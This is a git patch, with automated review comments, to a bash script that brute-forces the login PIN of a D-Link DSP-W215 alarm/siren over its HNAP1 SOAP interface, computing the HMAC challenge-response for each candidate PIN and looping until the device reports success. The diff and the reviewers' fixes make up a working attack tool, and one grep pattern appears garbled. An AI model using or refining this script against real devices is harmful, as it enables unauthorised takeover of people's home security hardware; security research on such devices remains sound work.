From 51bed0fb5f840d76127d5c4dca0fd145b801dcce Mon Sep 17 00:00:00 2001
From: rtrimana
Date: Thu, 21 Dec 2017 15:04:35 -0800
Subject: [PATCH] Perfecting brute-force attack for D-Link alarm/siren; basically we have to always do challenge-response (with pin) pair for every attempt until we see the value of LoginResult field changed from 'failed' to 'success'

---
 benchmarks/other/DLinkAlarm/attack.sh | 23 ++++++++++++++++-------
 1 file changed, 16 insertions(+), 7 deletions(-)

diff --git a/benchmarks/other/DLinkAlarm/attack.sh b/benchmarks/other/DLinkAlarm/attack.sh
index 39fb94e..609f95a 100755
--- a/benchmarks/other/DLinkAlarm/attack.sh
+++ b/benchmarks/other/DLinkAlarm/attack.sh
@@ -1,7 +1,8 @@
 #!/bin/bash
 #modify next two line for your DSP-W215
-IP="192.168.0.35"
-PIN=215530
+IP="192.168.0.4"
+#PIN=0
+PIN=215500
 #do not modify after this line if you don't know what you are doing
 function usage {
@@ -29,6 +30,10 @@ end=""
 message="requestadmin$password"
 loginrequest="$head$message$end"
+loop=true
+while $loop
+ do
+ ret=`curl -s -X POST -H "$contentType" -H "$soapLogin" --data-binary "$loginrequest" http://$IP/HNAP1`
 function getResult {
@@ -36,15 +41,12 @@ function getResult {
 echo -n "$opt"
 }
 
-PIN=0
-
-while true
- do
-echo -e $PIN
+echo -e "Current pin: $PIN"
 let PIN=$PIN+1
 challenge=`getResult Challenge`
 cookie="Cookie: uid=`getResult Cookie`"
 publickey="`getResult PublicKey`$PIN"
+echo -e "Public key: $publickey"
 privatekey=`hash_hmac "$challenge" "$publickey"`
 password=`hash_hmac "$challenge" "$privatekey"`
 timestamp=`date +%s`
@@ -60,6 +62,13 @@ login="$head$message$end"
 mret=`curl -s -X POST -H "$contentType" -H "$soapLogin" -H "$hnap_auth" -H "$cookie" --data-binary "$login" http://$IP/HNAP1`
 echo -e "$mret"
+status=`echo -n "$mret" | grep -Po "(?<=).*(?=)"`
+echo -e "Status: $status\n\n"
+if [ $status = "success" ]
+then
+ echo -e "SUCCESSFUL ATTEMPT: Siren hacked successfully! The pin is: $PIN\n\n\n"
+ loop=false
+fi
 done
-- 
2.34.1
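Review bot: The commented-out `#PIN=0` line added between `IP=` and `PIN=215500` is dead configuration, and it makes the `#modify next two line for your DSP-W215` comment above it inaccurate since three lines now follow it. If the intent is to record an alternative starting value, a comment saying so reads better than a disabled assignment, e.g. `# PIN: starting value of the search; the loop below increments it before each attempt`; otherwise drop the line. Both values stay hard-coded even though a `usage` function follows, so presumably they are meant to be edited in place rather than passed as arguments — worth saying so in that comment.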
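Review bot: The loop is opened here with `loop=true`, `while $loop` and `do` before the `function getResult {` definition, so the function is re-declared on every iteration and the loop head is separated from its `done` (last hunk) by a function body. Moving these four added lines, including the `ret=` request that fetches a fresh challenge, to just above the per-attempt statements in the next hunk keeps the definition outside the loop. `while $loop` also works only because `true` and `false` are commands; `while [[ "$loop" == true ]]` states the intent. `$IP` is unquoted in the URL, as on the `mret=` line in the last hunk. The loop body continues outside this hunk.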
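Review bot: `echo -e "Current pin: $PIN"` prints the value before `let PIN=$PIN+1` runs, so the label describes the previous attempt rather than the one about to be made, and the configured starting value from the first hunk is itself never used. Either increment at the end of the loop body or document it with `# PIN is incremented before use: the configured value is a lower bound, not the first attempt`. The added `echo -e "Public key: $publickey"` prints the device public key concatenated with the candidate PIN on every iteration; that is the HMAC input, so it belongs behind a verbose flag rather than unconditional output. The enclosing loop starts and ends outside this hunk.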
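Review bot: `if [ $status = "success" ]` leaves `$status` unquoted; when the grep pipeline matches nothing (empty `$mret` because `curl -s` failed, or a changed response shape) the test degrades to `[ = success ]`, `[` prints an error, and the loop keeps going with no termination condition other than success. Quote it and stop on an empty result, e.g. `[[ -z "$status" ]] && { printf 'empty response, stopping\n' >&2; break; }` before the comparison, and consider a maximum attempt count so a benchmark run is bounded. The `grep -Po "(?<=).*(?=)"` pattern as shown has an empty lookbehind and lookahead and so matches the whole response; presumably the XML tag names were lost in rendering, but confirm the pattern in the file, since as written `$status` could never equal `success`. The `done` is in this hunk but the loop is opened in the second hunk.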